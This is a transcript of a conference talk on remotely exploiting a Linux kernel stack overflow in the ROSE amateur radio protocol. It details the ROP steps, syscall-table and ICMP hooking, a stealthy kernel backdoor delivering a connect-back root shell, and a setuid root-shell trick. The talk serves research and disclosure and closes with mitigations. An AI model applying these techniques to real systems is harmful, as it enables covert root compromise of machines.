 Thanks everybody for coming despite the late hour. This is owned over amateur radio and we're going to be talking about remote kernel exploitation. First a little bit about me. My name's Dan. I am a security consultant at VSR in Boston, mostly doing app and network pen testing, code review, that sort of thing. I've published a few bugs. Mostly I focus lately on the Linux kernel and especially on Linux kernel exploitation and mitigation. So what are we going to talk about today? First I was going to provide some motivation on why I wanted to give this talk and what I hope you guys will get out of it. And next we'll just dive right into some of the technical details of what are some of the challenges associated with developing fully working remote kernel exploits. Next we'll take a look at what some of the past work has been in remote kernel exploitation and try to draw some trends there and look at areas that haven't been covered as much. And then we'll get into the body of the talk, which is sort of a case study of an exploit that I wrote for a remote stack overflow in the Linux kernel's implementation of the Rose amateur radio protocol. And this part of the talk will be in sort of two phases. In the first phase I'll sort of explain exploitation of the vulnerability. And the second phase I'll explain the details of the kernel backdoor that I installed during the exploitation phase. And then finally we'll wrap up taking a look at some future work. I think remote kernel exploits sort of speak for themselves as to why they're useful. It's sort of this keys to the kingdom concept where you have instant remote root access to a machine that you previously had no interaction with. But especially when you compare them with the challenges that are facing you when you're trying to exploit client side systems, like browsers, for example. If you have a browser exploit, you're frequently facing exploit mitigation technologies like ASLR and NX or DEP. And sometimes those require the existence of a second vulnerability to bypass. And at that point you may be running inside a browser sandbox, for example, as IE9 and Chrome and most recently Safari now provide. So if you can leverage a third vulnerability to escape that sandbox, you may need to escalate privileges using a fourth vulnerability because you're running as an unprivileged user. And that seems like a lot of pain, so I'd prefer to skip all that. What I hope you guys will get out of this talk, this is not actually an amateur radio talk, despite the really misleading title. We're going to talk about enough of amateur radio to understand the vulnerability that I'm using. But really this is sort of a vehicle for me to talk about exploit development methodology. So hopefully if you guys don't have any experience writing exploits, you'll hopefully get a sense of what are some of the building blocks that we can use to exploit these kinds of vulnerabilities? What are some of the steps that we need to go through? And I'll also be showing off a bunch of sort of exploitation techniques, which I think is far more interesting and useful than doing a study of an individual bug, because bugs come and go, they get fixed all the time, but exploit techniques and learning how to mitigate them are really defined lots of bugs. And sort of the whole point of this is to take a look at this exploit and identify what the weak links in the chain are, what are the parts of the exploit that aren't really done so well so that we can identify what are the easiest ways to protect against these kinds of exploits. So despite their advantages, remote kernel exploits are not trivial, right? And I've sort of identified three key points as to why there are some extra challenges associated with these kinds of exploits. The first of these is that the environment that you're working in is incredibly fragile. If you're dealing with a remote userland exploit, for example, like a web server or an FTP server or something like that, frequently if you fail, if you're dealing with some sort of memory corruption vulnerability and you miscalculate some offsets or your exploit fails for some other reason, frequently you'll crash the application or service. In some cases it needs to be restarted manually and others it'll be restarted automatically. If you're dealing with a service that actually forks child processes for each connection, you may not even crash the service itself, you'll just crash the child process and you essentially have very minimal consequences for failure and you can continue to try to exploit it. In contrast, if you fail at a remote kernel exploit, in nearly every case, the kernel's going to panic and the box will fall over. And not only will you have lost your chance to exploit that machine, but you've lost any chance of doing so with any sense of stealth. It's a little bit noisy to crash an entire machine. The second main obstacle, in my opinion, for these kinds of exploits is that you have very little control over the environment that you're trying to exploit. And this is sort of a shared property of all remote exploits. If you're dealing with a local kernel exploit where you have an unprivileged account on the machine, you have a lot of sort of exploit primitives, sort of building blocks that you can use to make writing exploits easier. For example, it's very easy to trigger the allocation of data structures on the kernel heap. You can open files or sockets or create shared memory segments. And all of these resources have structures on the kernel heap. And you can sort of trigger these allocations in such a way as to massage the heap into a state that's conducive to exploitation. Likewise, you can trigger the calling of function pointers in the kernel by performing operations on these structures that you've allocated. And finally, there's this huge silver platter of information the kernel gives you if you're a local user through interfaces like Unlinux, the proc file system, that will really help you find out where things are in kernel memory and help target your attacks. If you're dealing with a remote kernel exploit, you don't actually have any of those capabilities right away. But we may see how you can sort of build them up from other exploitation primitives you might have. And the final challenge, in my opinion, with writing these exploits, is they frequently occur in what's known as interrupt context. So 10-second operating system 101, when a process makes a system call, it is executing kernel code in what's known as process context, where the threat of execution has a user land application, a process associated with it. But in contrast, when you're dealing with asynchronous events, like receiving networking data, the kernel is running in what's known as interrupt context. It doesn't have a process associated with that threat of execution. And this is a very sort of delicate and difficult context to exploit, because the end goal here is usually to execute code in user land, because a shell is a really nice, convenient way to interact with the system, and that's sort of what everybody wants. So the challenge is, how do we get from this sort of hostile, interrupt context environment to executing code in user land? And the answer is we need to find a way to transition from interrupt context to kernel mode process context, in which we're still running kernel code, but we now have a process associated with us, and then finally from there to actually executing code in user land. So before I get into what I did, I thought it would be prudent to talk about what's been done before. So I studied, I looked up and researched every remote kernel exploit I could find anywhere. And I identified 18 exploits that have been talked about or published for 16 unique vulnerabilities. These were written by 19 people, nine of them have full public source code, many of them metasploit modules, three of them have sort of partial or proof of concept source code, and the rest were sort of discussed in detail at conferences without code. And these exploits cover a wide range of platforms. Solaris and OSX have not had any weaponized remote kernel exploits. That's sort of future work, if you're into that sort of thing. Breaking these down by what operating systems they affect, half of the 16 vulnerabilities were in Windows, only four of those were actually in the Windows core components, three of them were in various wireless drivers and one was in a semantic firewall, three in network, which I don't think anyone still uses network, three in various BSDs and two in Linux, one of which was in a third party driver. And breaking these down by vulnerability class as to what vulnerability was exploited, a full three quarters of these, 12 of the 16 were typical stack overflows. And I think this is probably because these vulnerabilities are incredibly conducive to exploitation, they're very well understood, the steps of exploiting them are known. Three of these vulnerabilities were heap overflows, which are frequently much more difficult, and then one of these Windows SMB issue is actually an array indexing issue. I'm not sure there's actually enough data to draw meaningful conclusions about trends here, but 2007 was a busy year for kernel exploitation. So just a brief walkthrough of some of what are, in my opinion, the highlights of past work on remote kernel exploits. Barnaby Jack did the first work that I'm aware of, he started in 2004, 2005, and he exploited a remote stack overflow in a semantic firewall application. And he demonstrated a lot of really cool things, especially detailed shell code examples for how to transition from running in the kernel to actually executing userline code. And he also demonstrated a kernel backdoor that in many ways was sort of an inspiration for the one I ended up implementing. Next in 2006, Sinan Aran from Immunity, they announced that they had Green Apple, which was a remote kernel exploit for Windows. And that's sort of the first commercially available remote kernel exploit that I'm aware of. Also in 2006, HD Moore, Matt Miller, and Johnny Cash published three remote kernel exploits that were all added to Metasploit in various Wi-Fi drivers. 2007, there was an open BSD IPv6 vulnerability, which was really awesome. That was the first public remote kernel heap overflow that I'm aware of. They did some nice work on that. And they also bypassed userland NX protection as a non-executable stack heap, et cetera. Final highlights, Immunity has a Canvas exploit for MSO8-2001, which is a Windows IGMP v3 vulnerability. And that was a really difficult to exploit Windows kernel pool overflow that people were questioning whether it was exploitable before they announced that they had a reliable exploit. And then finally, in 2009, it's GraCU published an exploit for a Linux kernel vulnerability in the SCTP protocol, which is a remote Linux heap overflow. And I think one of the great contributions from this exploit is he introduced a really neat trick that leverages in a 64-bit specific page mapping to easily transition from interrupt context to executing code directly in userland. Just sort of drawing some trends from all this work I did reading up on what's been done before. Three quarters of these issues were stack overflows, but none of these actually had to contend with having non-executable stacks in the kernel itself, because the feature wasn't introduced at that point. So my exploit, we'll try to address that. Next, neither of the two issues on Linux actually were stack overflows in interrupt context, which is sort of a particularly difficult context to exploit things in, because you need to do a bunch of cleanup. As GraCU and TWIS published an article in FRAC64 called Notes on Kernel Exploitation, or something of that effect, and they sort of described the steps you need to go through to do this, but it was for a vulnerability introduced for the sake of demonstration, and I wanted to provide a real-life example. And the last observation is that six of the 18 exploits were for issues in 802.11 code. So I think wireless drivers could probably use some improvement. And now we've gotten to the good stuff. Before we start talking about how to write this exploit or what the bug is, the target system that I'm going after, I'm using a 32-bit x86 physical address extension kernel, and the PAE component is significant because it means the kernel now has NX support, as in the kernel stacks and kernel heap, kernel data are all now non-executable, so we can't just execute code on the kernel stack immediately without doing something first. They also, you know, these kernels have userland NX protection as well, so if we're going to somehow introduce code into a user process, we also need to do so in a way that honors page permissions. We can't execute code on a userland stack without modifying its permissions. And then finally, because we're on a 32-bit machine, we can't leverage sGRAC use trick that was specific to AMD64 to make that transition from interrupt context to userland. For actually doing testing, I just had two VMs, I chose Ubuntu 10.04. The attacker is just a desktop machine, the victim is Ubuntu server because that's a PAE build. For debugging, I just use KGDB, and for the actual networking, I was not sitting in my apartment doing, like with radio equipment driving my girlfriend crazy. I was using BPQ, which is an implementation of AX25 amateur radio over Ethernet, so my VMs can talk to each other without me needing to buy radio hardware or get a license. And just because of the nature of the exploit, it's written entirely in X86 assembly except for the code that sort of ties it all together and sends it over the wire. So this is the advisory that Debian put out for the vulnerability that I'm gonna be exploiting. Dan Rosenberg, first they spelled my name wrong. They spelled it right in actually five other issues in the same advisory, got it wrong in this one, which is some sort of sign. Reported two issues in the Linux implementation of the amateur radio X25 PLP protocol. A remote user can cause a denial of service by providing specially crafted facilities fields. And this is a pretty interesting denial of service. So just a brief overview of the protocol we're gonna be exploiting, just enough detail to talk about so you understand the vulnerability that I'll be taking advantage of. Rose is a fairly rarely used amateur radio protocol and it's a network layer that sits on top of AX25, which is sort of a more commonly used packet radio protocol. So in addition to a seven byte AX25 addresses, Rose nodes have 10 digit numeric addresses to identify them. And it supports only static routing and it does so using a DigiPeter mechanism where a host can essentially say, all right, I'll accept packets from this AX25 call sign and forward them all into this one. So when two hosts issue a connection to each other using Rose, they exchange what are known as facilities. And this is sort of just a list of supported features for that connection. And one of these facilities, FAC National Digi's, allows one host to give the other host a list of DigiPeters just so it can figure out its routing stuff. And in the Linux kernel implementation, I noticed that when they went to parse this particular field in the Rose frame, they read this length value directly from the frame and copied all this DigiPeter data without any bounds checking into a statically sized buffer on the kernel stack. And this is the sad code. You can see at the top line, they're just reading that length value right out of the frame data, using it as an upper bound for this loop that then copies data in in AX25 address size of chunks, which are seven bytes, into either the destination or source array. And those arrays are living on the stack. You may also notice that there's a constraint here. The seventh byte of every AX25 address is actually ended with a flag that indicates whether it's a source or destination DigiPeter. And that means in our payload, we need to obey that constraint. Every seventh byte needs to be consistently greater or less than OX80. Otherwise, one seven byte chunk might be copied into one array and then the next one might be copied into a different array and it would be very difficult to handle and it would be a pain. So this sort of just required me to go through the exploit and manually just check that this constraint was satisfied. So now we've got a plan of attack. We've got a vulnerability and we want to actually exploit it. The first step is to actually gain control of the instruction pointer so we can control what the kernel's gonna do. And from that point, we need to actually start executing code. Next, I decided that my exploit would install a remotely triggerable kernel backdoor, because that sounded like fun. And finally, we will have to do some cleanup to make everything keep running. So first, triggering the bug was actually really the easy part. It took 10 minutes after I found it. What I did was essentially cannibalize the rose kernel module that already existed so that whenever I made a connection to someone, it would send out my evil rose frame instead of a normal one. And this evil rose frame just had this particular facility field that was vulnerable followed by a too big length value and then a bunch of no op instructions just for the sake of testing to see if I could actually trigger it. This is what the frame looks like. You have your header, total facilities length, which didn't actually matter. Anulbite, FactNational is the specific type of facility. FactNational Digi is the vulnerable facility itself. And then this length value, which we're setting to OXFF, which is 255, which is more than enough to cause the overflow and then a bunch of 90s. And so you recompile your rose module and then you make a connection to your vulnerable host and it causes a stack overflow on the soft IRQ stack, which is an interrupt handler that's receiving this data. You can see in the debugger, our host, we've overwritten the save return address on the stack and then when that vulnerable function returned, it returned to all 90s, which is the value that we put there. So now we control the instruction pointer. As most people who've written serious exploits know, getting control of the instruction pointer and actually executing code can be separated by a lot of work. Traditionally, if it were like 1995, we would just sort of return into shell code that was stored in our buffer that was copied onto the stack and then we'd be running code and that's all you need to do. The first problem is we don't actually know where the soft IRQ stack lives in memory because it's allocated at runtime and it's gonna be different on each boot. That's pretty easily solvable. You just sort of return to this trampoline function that will do like a jump ESP and jump into the stack wherever it is. The second problem though is that since we're running a PAE kernel, the soft IRQ stack on which we caused our overflow is non-executable memory. So if we try to return there, the kernel will just crash. And this means we need to employ return-oriented programming. So the basic idea of return-oriented programming is because we've caused our stack overflow, we now control the return address where this function's going to go after it's finished doing whatever it's doing and we control a bunch of data on the stack past that saved return address. And we also notice that every return instruction will direct execution to the address that's on the stack and then increment the stack pointer to the next place. So using this, we can actually just chain together little pieces of code at known locations in the kernel to do essentially arbitrary computation. I say at known locations because this actually does rely on the fact that you know where stuff is in memory. And this is a fairly reasonable assumption in the kernel world. If you're running a distribution kernel like Ubuntu or Debian, Fedora, they're shipping binary kernels which means everyone with the latest version of Ubuntu has the same kernel image in memory in terms of the code. So it's fairly reasonable to assume that if you know something about your target, then you essentially know where in memory certain instructions live. And there's no sort of randomization of the kernel at all. To make this a little bit better, you can actually choose these gadgets, these little pieces of code that you're executing in such a way that they're more likely to appear across multiple kernel builds. So now actually looking at some code. What our RAP payload actually, what we want it to do is to actually make the stack that we overflowed executable so that we can run code on it. And the kernel has a really nice convenient function that'll take care of all the hard work for us called set memory X. And set memory X just takes two arguments. The first one is an address that you want to mark executable. And the second one is the number of pages from that point that you want to mark. So we're in the kernel, so the calling convention to functions actually has the first three arguments to the functions in registers. So we just need to keep that in mind. So what the RAP stub does is first, we actually want to load the stack pointer, which points into the stack that we want to mark executable into the EAX register because that's the first argument registered to this function. We'll actually align it to a page boundary because set memory X will cry a little bit if you don't have things page aligned. Then I just chose arbitrarily, let's mark four pages from that point into our second argument register, which is EDX. Return into set memory X, which is just gonna mark the software Q stack executable. And from that point, we can just return into a jump ESP instruction at which point execution will jump into the software Q stack and start running our code. So at this point, we are running shell code on the software Q stack in kernel mode, great. But we've got a problem. The amount of data that we could have copied into our overflowed region is limited to 255 bytes just by nature of the particular bug that we're exploiting. And we've already used a whole bunch of that to get up to the save return instruction. We've used more for our RAP payload. So we're running very low on space and kernel payloads can be quite big. So we really need to overcome that space constraint. But it's useful to keep in mind that that's just the part of the packet that copied into the overflow region. We have this rose frame that we sent that can be thousands of bytes big living somewhere on the kernel heap. And I found experimentally that one of the parent functions to the function that we cause an overflow and actually has a pointer to this rose frame, the entire rose packet that we sent over. So what we can do is now that we're executing code, all we need to do is walk up the stack, say, is this a kernel pointer? Yes, no, just heuristically. And if it is, you can follow it and look around in memory and we'll put a tag in our rose frame so that we can find it. And then we'll eventually just find our rose frame on the kernel heap, we'll mark it executable just by calling set memory x and then jump into it. So now we've overcome our space constraint. We can execute arbitrary length payloads running in kernel mode right now. And the goal here is I want to install a kernel backdoor in the ICMP handler, because it's badass. So just some data structures to sort of explain what I had to do here. It's not very complicated. There's this sort of global array at a known location because it's in kernel data called the InetProtosArray. And this just is an array of pointers to these net protocol structures. There's one for sort of each IP protocol, which is redundant. Like IP, there's a TCP one, there's UDP, ICMP. And the first member of this net protocol structure is a handler function pointer that just, that's what gets called when the kernel receives data for that protocol. So if we can overwrite that function pointer for the ICMP protocol, then whenever we receive ICMP data, it will call into our code and we can move on from there. So hooking ICMP is pretty straightforward. I decided to use the soft RQ stack itself as a place to sort of put stuff just for the exploit, because we've already marked it executable, so it's a good place to put code that we're gonna need later. It's persistent. It's not gonna go away while the kernel's running. And it's a very safe place because on Linux, kernel stacks are eight kilobytes big by default, but the bottom four kilobytes is guaranteed to never be written into. Otherwise, the optional four kilobyte stack version would never work. So anything in the bottom four kilobytes of the soft RQ stack outside of the metadata at the very bottom of it is a great place to store stuff. So what we do is we copy our hook and we'll explain what that does in the second part when I just grabbed the back door, but for now it's just some code that we wanna run into the soft RQ stack just for safekeeping. And then we wanna actually install a hook so that execution will be redirected to it. First, we notice that the handler that I wanna overwrite is in read-only memory, which is sort of a pain. x86 has a nice little way out for this. Control register zero has a bit called the write protect bit. And if you flip this bit, then you can essentially write into read-only memory with no problem. Which comes in handy. So what we do is we flip this bit. Now we can write into read-only memory. We write the address of this hook that we just copied in into the ICMP handler function pointer. And then it looks something like this. Wow, those are really narrow arrows, I guess. So whenever our kernel receives ICMP data, it will call that handler function pointer and that execution will go to this hook that we installed. It'll run whatever code we choose to run there. And then presumably when we're done, we're gonna call the original ICMP function so that ping still works and stuff like that. Finally, the last phase of this exploitation component is to actually make sure that the kernel keeps running because all this work is sort of for nothing if you do it and then the kernel just collapses. So the biggest problem here is that we've wiped out a pretty big portion of the stack by causing this overflow. And if we don't do any cleanup, then the kernel is just gonna crash. The first bit of cleanup I needed to do has to do with some locks. So at the time of the exploit, the rows protocol was holding two spin locks just for mutual exclusion purposes. And if we just sort of carry it on as if nothing happened, then the row stack would actually deadlock and the kernel would lock up. The problem here is these spin locks live inside the rows kernel module which is loaded at runtime so we don't actually know where it is. Fortunately, it's actually pretty easy to find it. There's this global modules variable which is the head of a linked list of loaded kernel modules. So what we can do is we just follow this linked list until we find the module named rows and read this sort of module structure that is hanging off this linked list until we find where the data section of the rows module is. Now that we know where the data section of this module is, we can sort of scan it for this byte pattern that represents a distinctive signature of what these spin locks look like in memory and that's unique. So that will always work. And then once we find them we can release them by I think it's incrementing them. The second bit of cleanup I needed to do has to do with the preemption count. So on Linux every process has this variable called preempt count which sort of encapsulates a bunch of information related to scheduling. And if the kernel calls an interrupt handler as it did when our malicious rows frame was received and returns from that interrupt handler and the preemption count isn't what it expects it to be. In the past the schedule would panic and everything would fall over. More recently they put in a check where if it's not what it expects it to be it actually just complains a little bit and fixes it for you. Which is really nice for exploitation and saved me a lot of trouble when I was first getting this up and running. But for the sake of completeness we'll avoid that warning because we don't want anything to be logged. It's really easy to find the preemption count. It just lives in this thread info structure which is at the base of whatever process it is, kernel stack. So all we need to do is we know where the soft ARQ stack is, we just find the base of it and then this variable is at a known offset from that base and we just decrement it appropriately and that's all we need to do. Now finally we need to do this actually cleanup so the kernel will keep running. So recalling that stacks are sort of divided into frames which represent function contexts essentially. Our overflow has wiped out some number of frames including all the metadata that's needed to keep things running. So what we need to do is we actually walk up the kernel stack until we match the signature that I prepare ahead of time that represents this is a frame boundary, this is a good place for us to put the stack pointer and everything will keep running as normal once we return from there. It's sort of as if we magically teleported up to a few parent functions. So let's go over what we've done so far. And that's the end of the exploitation phase. At that point, if you send your exploit over, it installs its hook and the kernel keeps running and it would never notice anything happening. So what we've done so far, we trigger our overflow, gain control of the instruction pointer and then we leverage return oriented programming to mark the soft ARQ stack where the overflow took place executable and then jump into a shellcode stub on the soft ARQ stack. Next, because we have this space limitation, we find the entire rose frame on the kernel heap, mark it executable and jump into it. Next, we install our kernel backdoor by hooking the ICMP handler and then we do some cleanup that we need to do to keep the kernel running. Next, we're gonna talk about the backdoor. So now at this point, whenever an ICMP packet is received, our hook that we put in kernel memory is gonna run. Now we wanna talk about what that hook's gonna actually do. So the first thing it does is it checks for this sort of arbitrary magic tag that I just made up in the ICMP header. And I decided that I wanted to have two distinct kinds of packets to handle. I wanted to have an install packet and what I want that to do is sort of cause it to keep shellcode that I put in the ICMP packet around for later, just sort of let it sit in kernel memory somewhere. And then I wanted to have a trigger packet that causes that shellcode to execute somehow. And this is user land shellcode that I wanna be dealing with. And these packets should be able to be sent independently. So you can sort of install a payload and come back a week later and cause it to trigger repeatedly. So we need to develop a strategy for how we're gonna actually make this happen. The problem here is the ICMP handler that we've hooked is also running an interrupt context. And we wanna get to user land. We wanna execute code in user land. So the first phase, we need to actually transition from interrupt context to kernel mode process context where we're still running kernel code, but it now has a process associated with our execution. In the second phase, we wanna actually hijack that process that's now associated with our execution and cause it to execute our user land payload. So for the first phase, we check the magic tag when we receive an ICMP packet. And if it's an install packet, then we'll just copy the payload that's in the packet into a safe place. And we're gonna keep using the software queue stack as a good place to store stuff. If we get a trigger packet, then we need to make that transition to process context. And in my opinion, the easiest way to do so is to hook a system call because whenever a process calls a system call, it will then be executing kernel code in process context, which is where we wanna be. How to do this has, it's been done before. I find the system call table at runtime by issuing an SIDT instruction, which is an x86 instruction that finds the base address of the interrupt descriptor table. And I just index into this table and pull out the handler for int 80, which is system call. So that's sort of the entry code for what happens when you call system call, when you make a system call. I scan this function for a byte pattern indicating it's making a call into another table. And this other table is the system call table. So you do that, now I know where the system call table is. And the system call table is just sort of like a table of essentially function pointers that represent handlers for what happens when you make a system call, like close or open or et cetera. The system call table on Linux is read only, but we've already figured out how to get around that. We just flipped that magic bit in CR zero. We can write your read only memory. So what we do is we just keep that system call handler, whatever one we wanna hook for later, because we're gonna need it. And we'll write the address of our hook code into the system call table. So now whenever someone calls that system call, it'll execute our code. Because we want the ICMP stack to keep working, then we just actually call the original ICMP handler that we kept around so the machine still pings. So now we wanna move on to phase two. So what we've done is we've copied our userland payload that we wanna execute eventually into kernel memory. And some process comes along and it's gonna call the system call that we chose to hook. And what we need to do now is hijack that process to execute our userland code. First of all, we're only really interested in processes that are running with root privileges. It would sort of suck if we went through all this trouble and got to connect back shell as a nobody user. So the challenge is how do we actually check that this random process that we hijacked is a root-owned process? And you could do this by actually following various pointers in metadata associated with that process. But each of these structures sort of is unstable. They change a lot between different kernel versions. You'd have to do it heuristically and it's sort of a pain. It'd be really nice if we could just call getUID because that's something we know and understand. It's a very simple interface that will immediately tell us what our user ID is. But the question is, is it possible to call system calls from kernel mode? I mean, logically it doesn't really seem to make sense because a system call is designed to be an interface that user applications can call to request services from the kernel. So what happens when you make a system call via int80 from kernel mode? I'm just curious, how many of you, if you had to guess, would think that you could do this without a problem? That's pretty good. How many of you think that some issues may arise if you try to make an int80 from kernel mode? How many of you have no clue what I'm talking about? Thanks for being honest. It turns out that most system calls will work perfectly fine when you call them from the kernel. And the details of this, you just need to know some x86 trivia but basically the problem that I thought might arise has to do with the fact that when you transition from user land to kernel mode, you switch stacks to a kernel mode stack and I thought that that might screw things up. But this stack switch only happens when you're changing privilege levels. So if you make a system call from kernel mode, you just skip the stack switch and use whatever stack is still there. And this is just like any other interrupt that is intra-privilege level, as in there are lots of interrupts that can be called from ring zero. And there's really no problems here. There are a few exceptions to this rule. Some system calls actually require the stack to be in a certain state using this per-thread register structure. And when you do it from kernel mode, these assumptions aren't really, are violated, so it won't work properly. And these are things like fork, exec v, clone, but those are really things we don't really have much of an interest in calling from kernel mode anyway. So now back to the actual challenge. We wanted to see if our process is owned by root. All you need to do is load the EAX register with the syscall number for get UID and call in daty. It's really easy. Then you can just check the return code. If it's zero, then we know our process is owned by root and we'll carry on. If it's not zero, then we'll just send that process along and have it call the original syscall handler that we hooked, so it just does whatever it was intending to do and keeps going. Next we need to actually inject our userland payload into this process that we've now hijacked. So the kernel stack, as a result of that stack switch that I just mentioned, actually has a pointer to the saved userland stack pointer. So when the process enters kernel mode, the CPU pushes the userland stack pointer onto the kernel stack so it can, when it returns from that system call, it knows to put its stack back to where it was. So we just, let's put our payload on the userland stack because we can just read that pointer and know where it is. So what we do is we copy that userland payload that we installed earlier as part of that sort of install packet from kernel memory, wherever we put it, onto this process's userland stack. Because we have a modern system, the userland stack is non-executable memory, so we can't immediately execute code there, but that's easy enough to fix. We'll just call mProtect by loading the appropriate system call number in EAX and arguments and make an int 80 from kernel mode to mark the userland stack executable. Now finally, sort of one of the last things we need to do is actually make sure that when this process that we're hijacking returns from the system call that it's in, it runs our code. So in addition to saving the userland stack pointer, the kernel saves the userland instruction pointer on the kernel stack so that when it returns from the system call it knows where to go. So we just need to overwrite this pointer on the stack with the address of this userland shellcode that we just injected, and then when it returns, it'll run our code in userland. Because we wanna do things perfectly and make sure nothing crashes, we actually, after we've done this, we'll jump to the original handler for that system call that we hijacked. So if we hooked close, for example, we want the close to still actually happen. Now the sort of part where you get to use your imagination, because we set this up this way, you can use whatever userland payload you want. Connect back shell is good, you can use metasploit payloads for all I care. One thing that I did do is that regardless of what userland payload you provide, I prefixed it with a stub that makes sure that the process you hijacked keeps running. And all this stub does is forks a new process and then the child runs the shellcode that you injected. Wow, it's rowdy over there. The child runs the shellcode that you injected and the parent process of the fork will jump to where it was originally gonna go so that if you're hijacking something important, it will keep doing whatever it was doing and be none the wiser. So now it's the real fun part where I get to demo this and pray to the demo gods. So I've got two VMs up and running. This is awful. Password is password like all my machines. So we're gonna set up the rows server stack. This is just a little shell script to create the appropriate interfaces and bind them. Likewise on the client, just bring up the rows protocol stack. I've aliased call to just make a rows call from this host, elite one to the victim host, loser one, using the rows port associated with this host. So when I type that, we've loaded our kernel exploit into this attacker machine's kernel. So whenever we make a call, it'll send our exploit over to the victim. So we'll do that and it's done. You don't have to clap yet because I haven't really proven anything. But you'll notice that absolutely nothing was logged. That's all just residual from bringing up the rows stack. And you would have no idea that this happened to you but that machine is now totally owned. So we will demonstrate the back door that I just installed as a part of running that exploit. So I'm gonna bring up a server that I wrote. This is actually an X25 connect back shell, which was sort of a pain to write. So this is just a server listening for X25 connections. And this is my little magic ping command that just builds your special ICMP packet. I'm gonna install this X25 shell code that I compiled. I'm gonna trigger it by hooking syscall six, which is closed. It's just a good choice because it gets called frequently. And the IP address of the victim. So we will send that packet over and wait a few seconds and pray to the demo gods. And we have a root shell. Now of course, once you've compromised a host, you need to always check for the zero data text file living in the home directory because you've earned it. Well, that's really difficult to read. Well, the point is I also audited the user land utilities associated with this network stack and the AX25 daemon actually has a missing return code check on set UID. So if you're actually handing out unprivileged shells using AX25, which I'm sure all of you do, you can actually make a connection, essentially fork bomb the machine and then make another connection and it'll fail the set UID call and it will give you a root shell instead of an unprivileged shell. That's sort of a funny bug. All right, this exploit has a lot of things that could use improvement. First off, the thing that really bothers me is that I hard coded a bunch of things. There are some advantages to using hard coding and this is sort of a toss up between reliability and portability. You know, if you're hard coding something, you're reasonably sure that it's going to work every time on the machine that you targeted it for. Versus like a heuristic approach where you're doing signatures or something that will work on a wider variety of hosts but may fail some of the time even on hosts that you've tested. On a physical address extension kernel like the one I targeted, it seems mostly unavoidable that you have to use Rop. So the goals here are really just to minimize the number of Rop gadgets that you use and minimize the amount of hard coding of other data structures that you have to do. If you're running a non-PA kernel, the situation's much better. You can actually just get by with a single known instruction, like a jump ESP instruction, for example, because you can jump right into the stack because it's executable. And it may be possible to do something with partial overwrites, like overwriting a portion of the frame pointer, a stack pointer, or doing some sort of spray approach where you don't even need to know any instructions. So the fact that it's PAE makes exploitation significantly more difficult. The next sort of limitation, in my opinion, is using this magic little write protect bit is fun and easy. Technically speaking, it's not the safest thing in the world. It's a per CPU bit, so if you have a multi-processor system, there's actually a small risk of flipping this bit so you can write to read-only memory, and then what if that thread gets scheduled out and scheduled back in on the other processor before you make the write, then it would try to write to read-only memory and crash. I have never seen or heard of that ever happening. That's a very, very small race window, but it's possible, and it might be worth considering alternative ways to write to read-only memory. It might be possible to just leverage kernel functions that already exist that will sort of do this in a safe way, and then the challenge becomes finding those at runtime. Now, sort of more general future work on the offensive side. Because these exploits really rely on knowing something about your target, I think remotely being able to fingerprint a kernel, identifying is this a distribution, what distribution is it, what version is it likely to be, is really essential in sort of gaining the information you need about your target to be able to build your exploit. I'd also like to look at other fun packet families for exploitation. Eerta, Bluetooth, X25 are all less tested and probably have plenty of fun bugs, and of course finding that IP bug that breaks the entire internet is always future work. On the defense side, I think it's pretty clear that the weakest link of this exploit is that you need to know things about the kernel. You need to know those known instruction locations. So if we do something like randomizing the kernel base at boot, which is a sort of Linux kernel patch series that I have tinkered with and sort of started to try to get upstreamed, that really totally prevents all this code release, and your exploit no longer works. In the absence of some sort of way of remotely disclosing kernel memory, which is possible, but I've actually never heard of such a bug. Additionally, it's pretty clear that the more exotic networking protocols are not tested as rigorously and could probably use some work. And next, it would be really nice if certain functions like setMemoryX were inlined so that you can't leverage them in return-oriented programming. So it's not quite so easy to mark things executable. And finally, a sort of long-term work. It would be really good if there were sort of policies implemented in the kernel that prevented changing page permissions after initialization. And I think the PAX team is actually working on something like this. So now we've got to questions. You guys have any questions? You're all just stunned. Yes? Sorry, what was that? Yeah, the bug was found through inspection. I actually had no real radio, amateur radio experience prior to that. I am not a licensed operator. So I was found through auditing. If I hooked GetUID in my exploit, that would probably cause an infinite loop, yeah. Because, yeah, because, yeah, exactly. You would, your hook would get called and then you would call GetUID in your hook and it would call your hook again. Don't use that one, I guess. Good point. I'm sorry, would you mind speaking up? You mean, if I understand, did you mean creating a USB device that sort of exploits itself? You need to get what on the system? Oh, to send, like, if you were doing with real radio hardware? How would we talk afterwards? Any other questions? I saw one over there. Can you just disable interrupts? Oh, that would probably help, yeah. For the right protect bit, you mean? Yeah, I think that would probably work, yeah. Good idea. John? No, no, I don't wanna marry you, John. All right, cool, thanks guys.